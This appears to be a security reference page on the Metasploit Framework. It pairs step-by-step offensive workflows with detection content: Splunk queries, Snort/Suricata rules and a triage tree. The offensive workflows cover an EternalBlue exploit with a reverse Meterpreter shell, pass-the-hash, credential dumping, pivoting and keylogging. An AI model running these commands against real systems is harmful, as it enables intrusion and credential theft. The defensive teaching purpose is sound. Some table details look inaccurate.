Tools
T1203Metasploit
What Metasploit Framework is, how penetration testers and attackers use its modules for reconnaissance, exploitation, and post-exploitation, and how defenders detect Metasploit activity on their networks.
View on Graph
What Metasploit Is and How It Works
Metasploit is an open-source exploitation framework developed and maintained by Rapid7. It provides a modular platform for developing, testing, and executing exploit code against target systems, and is the tool most commonly used alongside Nmap for port scanning and service discovery before exploitation. The framework bundles hundreds of exploits, thousands of payloads, and dozens of auxiliary and post-exploitation modules into a single command-line console (msfconsole).
MITRE ATT&CK maps exploitation for client execution to T1203 (Exploitation for Client Execution) — Metasploit is the primary tool used for this technique in both authorized penetration tests and real-world attacks. However, Metasploit covers the entire kill chain: T1595 (Active Scanning) for reconnaissance, T1190 (Exploit Public-Facing Application) for exploitation, T1059 (Command and Scripting Interpreter) for post-exploitation, T1003 (OS Credential Dumping) via Mimikatz integration, and T1041 (Exfiltration Over C2 Channel) for data theft.
The framework is written in Ruby with a component architecture that makes it extensible: every exploit, payload, and scanner is a standalone module that can be loaded, configured, and executed independently.
Module Architecture
Every piece of Metasploit is a module. Understanding the module types is the foundation of using the framework effectively.
| Module Type | Purpose | Examples |
|---|---|---|
| Exploit | Delivers an attack against a specific vulnerability. Each exploit targets a specific CVE on a specific service/OS. | exploit/windows/smb/ms17_010_eternalblue, exploit/multi/http/struts2_rest_ognl_injection |
| Payload | Code that runs on the target after the exploit succeeds. Separated from the exploit so you can mix and match. | windows/x64/meterpreter/reverse_tcp, linux/x64/shell_reverse_tcp |
| Auxiliary | Non-exploit modules: scanners, fuzzers, recon tools. Do not deliver payloads. | auxiliary/scanner/portscan/tcp, auxiliary/scanner/smb/smb_login |
| Post | Modules that run inside a live session on a compromised host. Privilege escalation, credential dumping, lateral movement. | post/windows/gather/hashdump, post/multi/gather/ssh_creds |
| Encoder | Obfuscates payloads to evade signature-based detection. Most encoders are largely ineffective against modern EDR. | x64/zutto_dekiru, x86/shikata_ga_nai |
| NOP | Generates NOP (no-operation) sleds for exploit alignment. Rarely needed outside exploit development. | x86/opty2, x64/simple |
Module Path Convention
Modules are addressed by their full path in category/os/name format:
use exploit/windows/smb/ms17_010_eternalblue
use auxiliary/scanner/portscan/tcp
use post/windows/gather/hashdump
The search command accepts keywords, CVE numbers, or module names and supports wildcards:
msf6 > search ms17_010
msf6 > search eternalblue
msf6 > search type:exploit platform:windows cve:2021
msf6 > search type:auxiliary smb_login
Essential msfconsole Commands
These are the commands you use in every Metasploit session:
| Command | What It Does | Example |
|---|---|---|
search | Find modules by keyword, CVE, platform, or type | search eternalblue |
use | Load a module by path | use exploit/windows/smb/ms17_010_eternalblue |
show options | List all required and optional parameters for the loaded module | show options |
show payloads | List compatible payloads for the loaded exploit | show payloads |
show targets | List supported target OS versions/configurations | show targets |
set | Set a module option value | set RHOSTS 10.0.0.50 |
setg | Set a global option (persists across module switches) | setg RHOSTS 10.0.0.0/24 |
unset | Clear a module option | unset PAYLOAD |
check | Test if a target is vulnerable without exploiting | check |
run / exploit | Execute the loaded module | run or exploit -j (run as job in background) |
sessions | List, interact with, or kill active sessions | sessions -l / sessions -i 1 |
sessions -u | Upgrade a shell session to Meterpreter | sessions -u 1 |
background | Background the current session (return to msfconsole) | Ctrl+Z or background |
resource | Run a resource script (automation file) | resource /path/to/script.rc |
db_nmap | Run Nmap from within msfconsole and store results in database | db_nmap -sV 10.0.0.0/24 |
hosts | List discovered hosts from the database | hosts |
services | List discovered services from the database | services |
loot | List collected data (hashes, screenshots, files) | loot |
creds | List collected credentials | creds |
route | Add a route through a session for pivoting | route add 10.0.1.0/24 1 |
info | Display detailed information about a module | info exploit/windows/smb/ms17_010_eternalblue |
back | Unload the current module | back |
spool | Log all console output to a file | spool /tmp/engagement.log |
makeinfo | Export session data in a report format | Used with pro for engagement reporting |
Common Exploitation Workflows
Workflow 1: External Reconnaissance to Initial Access
This is the standard external penetration test flow.
1. Port scan the external IP range
msf6 > db_nmap -sS -sV -O 203.0.113.0/24
2. Check for SMB vulnerabilities (EternalBlue / BlueKeep)
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 > set RHOSTS 203.0.113.0/24
msf6 > run
3. Load the exploit for a confirmed vulnerable host
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 203.0.113.50
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 10.0.0.10
msf6 > set LPORT 4444
msf6 > exploit
4. If success → interactive session established
meterpreter > sysinfo
meterpreter > getuid
Key considerations:
- Use
checkbeforeexploitto verify a target is vulnerable — avoids crashing a production system with the wrong exploit - Set
LHOSTto your actual listener IP, not a loopback address - Use
LPORTthat is not blocked by firewalls (443 or 80 are common bypass ports) exploit -jruns the listener as a background job, allowing you to continue working on other targets- Staged payloads (e.g.,
meterpreter/reverse_tcp) are smaller and faster, but stageless payloads (e.g.,meterpreter_reverse_tcp) handle single-packet delivery
Workflow 2: Post-Exploitation — Reconnaissance and Privilege Escalation
After gaining a Meterpreter session:
1. System reconnaissance
meterpreter > sysinfo # OS version, architecture, domain
meterpreter > getuid # Current user context
meterpreter > ipconfig # Network interfaces and IPs
meterpreter > arp # ARP table — peers on the local subnet
meterpreter > netstat # Active connections on the host
meterpreter > ps # Running processes
2. Check privileges
meterpreter > getprivs # List available privileges
meterpreter > getsystem # Attempt automatic privilege escalation
3. If getsystem fails, use a local escalation module
msf6 > use post/windows/escalate/
# Explore available escalation modules:
msf6 > search type:post platform:windows escalate
4. Dump credentials
meterpreter > hashdump # Dump SAM hashes (requires SYSTEM)
meterpreter > lsa_dump_secrets # Dump LSA secrets (requires SYSTEM)
meterpreter > kerberos_ticket_list # List Kerberos tickets
5. Enable Remote Desktop (if needed)
meterpreter > run post/windows/manage/enable_rdp
6. Pivot to the internal network
meterpreter > run autoroute -s 10.0.1.0/24 # Add route through session
msf6 > route add 10.0.1.0/24 1 # Route traffic through session 1
# Now exploit internal hosts through the compromised host
Workflow 3: Lateral Movement
Once you have credentials or hashes, move laterally within the network:
1. Use captured hashes for pass-the-hash
msf6 > use exploit/windows/smb/psexec
msf6 > set RHOSTS 10.0.1.50
msf6 > set SMBUser Administrator
msf6 > set SMBPass <NTLM_HASH>
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 10.0.0.10
msf6 > set LPORT 4455
msf6 > exploit
2. Use PsExec with explicit credentials
msf6 > use auxiliary/admin/smb/psexec_command
msf6 > set RHOSTS 10.0.1.50
msf6 > set SMBUser DOMAIN\Admin
msf6 > set SMBPass Password123
msf6 > set COMMAND whoami
msf6 > run
3. Use WMI for execution (less logged than PsExec)
msf6 > use exploit/windows/local/wmi
# WMI lateral movement is quieter than SMB-based methods
Key Payload Types — Meterpreter and Beyond
Staged vs. Stageless Payloads
Understanding this distinction is critical for evasion.
| Feature | Staged (/reverse_tcp) | Stageless (_reverse_tcp) |
|---|---|---|
| Size | Small stub (~2 KB) | Full payload embedded in one payload (~200-500 KB) |
| Delivery | Stub connects → downloads stage → executes | Single payload delivered, connects, and runs |
| Reliability | Depends on stage download working | Self-contained |
| Detection risk | Two connections; stage download looks unusual | One larger payload easier to detect inline |
| Common usage | Network-based exploitation (browser, SMB) | Staged is default for most exploits |
Naming convention:
windows/x64/meterpreter/reverse_tcp→ Staged (note the/between stage types)windows/x64/meterpreter_reverse_tcp→ Stageless (note the_instead of/)
Common Payload Options
| Payload | Use Case |
|---|---|
windows/x64/meterpreter/reverse_tcp | Standard Meterpreter over TCP — most common |
windows/x64/meterpreter/reverse_https | Meterpreter over HTTPS — evades most egress filters |
linux/x64/meterpreter/reverse_tcp | Linux targets with Meterpreter |
java/meterpreter/reverse_tcp | Cross-platform Java Meterpreter |
php/meterpreter/reverse_tcp | PHP-based web shells |
python/meterpreter/reverse_tcp | Python Meterpreter (useful when no compiler) |
windows/x64/meterpreter/bind_tcp | Bind shell (attacker connects to target) — avoid when NAT is present |
generic/shell_reverse_tcp | Simple reverse shell — no Meterpreter features |
Meterpreter Features
Meterpreter provides key features beyond a basic shell:
- In-memory execution: Meterpreter payloads load entirely in memory. They never write to disk, which evades file-scanner AV.
- Encrypted communication: Meterpreter sessions communicate over RC4-encrypted TCP or AES-encrypted HTTPS tunnels.
- Loading post-exploitation modules: No need to upload separate tools — load
mimikatz,kiwi,hashdump,screenshare, etc. on demand over the encrypted channel. - Anti-forensics: Migration to a trusted process (like
explorer.exeorsvchost.exe) removes the original injector process.
meterpreter > migrate -N explorer.exe # Migrate to explorer.exe
meterpreter > load mimikatz # Load Mimikatz over the channel
meterpreter > kerberos_ticket_list # List Kerberos tickets
meterpreter > screenshot # Take a screenshot of the desktop
meterpreter > keyscan_start # Start keylogging
meterpreter > keyscan_dump # Dump captured keystrokes
Metasploit Detection — Network and Endpoint
Network-Level Detection
| Indicator | What to Look For | Detection Method |
|---|---|---|
| Meterpreter staging | A small initial connection followed by a large payload download within seconds | NetFlow — look for short-lived TCP connections with inconsistent byte counts (small out, large in) |
| Default port 4444 | Connections to/from TCP 4444 — Metasploit’s default LPORT | Not definitive (attackers change ports) but a strong starting point for triage |
| Meterpreter HTTPS | JA3 fingerprint for Metasploit’s default HTTP client | JA3: 51c64c77f60f8b382d2e9bcd95e55dd1 (Metasploit’s default RC4 cipher suite). Cross-reference with known-threat feeds. |
| Reverse TCP shell | Connection to an external IP that is immediately followed by interactive-looking traffic patterns (irregular timing, small bursts of data) | Beaconing analysis — human SSH-like typing patterns over TCP sessions |
| SMB exploit traffic | ms17_010_eternalblue — fragmented SMB transactions, trans2 pipes, double-pulsar ping | IDS/IPS rules detect EternalBlue and DoublePulsar by packet-level signatures. Snort and Suricata rules (sid:41978 / ET EXPLOIT MS17-010) catch the exploit handshake. |
Endpoint-Level Detection
| Indicator | What to Look For | Detection Method |
|---|---|---|
| PowerShell in-memory injection | Reflection loading of Meterpreter via PowerShell | Sysmon Event ID 4104 (PowerShell ScriptBlock logging) — look for [System.Reflection.Assembly]::Load and byte arrays |
| Process injection | Meterpreter injects into explorer.exe, svchost.exe, winlogon.exe | Sysmon Event ID 8 (CreateRemoteThread) monitoring for suspicious process injection. Event ID 10 (ProcessAccess) for handle opens across process types |
| Unusual process creation | rundll32.exe, regsvr32.exe, or mshta.exe spawning a network connection without a legitimate parent | Sysmon Event ID 1 (ProcessCreate) + Event ID 3 (NetworkConnect) correlation |
| Service installation | Metasploit’s psexec module installs a Windows service | Sysmon Event ID 13 (Registry value set — ServiceDLL), Event ID 7045 (new service) in Windows Event Log |
| Windows Event 4688 | Process creation from unusual source (e.g., cmd.exe spawned by explorer.exe with network args) | Track CommandLine parameters — -enc encoded commands or PowerShell one-liners |
Splunk SPL — Metasploit Detection (run in Splunk)
# Meterpreter process injection via Winlogon/explorer
index=windows EventCode=4688
ParentProcessName IN ("*\\winlogon.exe", "*\\explorer.exe", "*\\svchost.exe")
NewProcessName IN ("*\\cmd.exe", "*\\powershell.exe", "*\\rundll32.exe", "*\\regsvr32.exe")
| stats count by ComputerName, User, ParentProcessName, NewProcessName, CommandLine
| sort - count
# PsExec service creation (Metasploit psexec module)
index=windows EventCode=7045
ServiceName IN ("PSEXESVC", "*Service*") OR ServiceName LIKE "%"
ImagePath IN ("*\\psexesvc.exe", "*\\msf*")
| table _time, ComputerName, ServiceName, ImagePath, AccountName
| sort - _time
# SMB exploitation — network connections to suspicious ports
index=network sourcetype=flow
dest_port IN (445, 139, 3389)
| stats sum(bytes) as total_bytes, count by src_ip, dest_ip, dest_port
| where count > 100
| sort - count
# Outbound connections on non-standard high ports
index=network sourcetype=netflow
dest_port > 1024
| where dest_port != 443 AND dest_port != 80 AND dest_port != 8080
| stats count by src_ip, dest_ip, dest_port
| where count > 50
| sort - count
Snort/Suricata Rules — Metasploit Detection
# Detect EternalBlue exploit traffic
alert tcp $HOME_NET any -> $EXTERNAL_NET 445 (
msg:"ET EXPLOIT MS17-010 SMB Remote Code Execution Attempt";
flow:to_server,established;
content:"|ff|SMB|73 00|"; depth:5; offset:4;
content:"|08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00|";
reference:cve,2017-0144;
classtype:attempted-admin;
sid:1000001; rev:1;)
# Detect Meterpreter staging on default port
alert tcp $EXTERNAL_NET any -> $HOME_NET 4444 (
msg:"ET MALWARE Meterpreter Reverse TCP Connection";
flow:to_server,established;
content:"|69 00 6e 00 69 00 74 00|"; depth:64;
reference:url,github.com/rapid7/metasploit-framework;
classtype:command-and-control;
sid:1000002; rev:1;)
Triage Decision Flow — Metasploit Detection
When a detection fires, follow this decision tree to determine if it is active Metasploit activity:
Metasploit detection fired
│
├─ Is there a confirmed exploit? (EternalBlue, BlueKeep, web app RCE)
│ ├─ Yes → Proceed to containment immediately
│ └─ No → Is there a Meterpreter session?
│
├─ Meterpreter session evidence:
│ ├─ Process injection into svchost.exe or explorer.exe
│ ├─ Encrypted TCP/HTTPS connection from the injected process
│ └─ Concurrent connections to unknown external IPs
│
├─ Containment actions:
│ ├─ Isolate the compromised host (network quarantine VLAN)
│ ├─ Kill the Meterpreter process (use [Sysinternals](/tools/sysinternals) Process Explorer)
│ ├─ Block the C2 IP/domain at the firewall
│ └─ Collect a memory dump for forensics
│
└─ After containment:
├─ Determine initial access vector (phishing? unpatched service?)
├─ Check lateral movement — has psexec or WMI been used from this host?
├─ Dump credentials — were hashes stolen? Are other hosts at risk?
└─ Full incident response: reimage, rotate all domain passwords, audit persistence
Related
- Mimikatz — detection and response for T1003 techniques
- Nmap — how nmap helps detect and analyze threats
- Common Ports and Protocols — covers the common ports and protocols concepts
- EDR Basics — detection and response for T1059, T1003, T1055, T1204, T1562 techniques
- Indicators: IoC, IoA, and TTP — covers the indicators: ioc, ioa, and ttp concepts
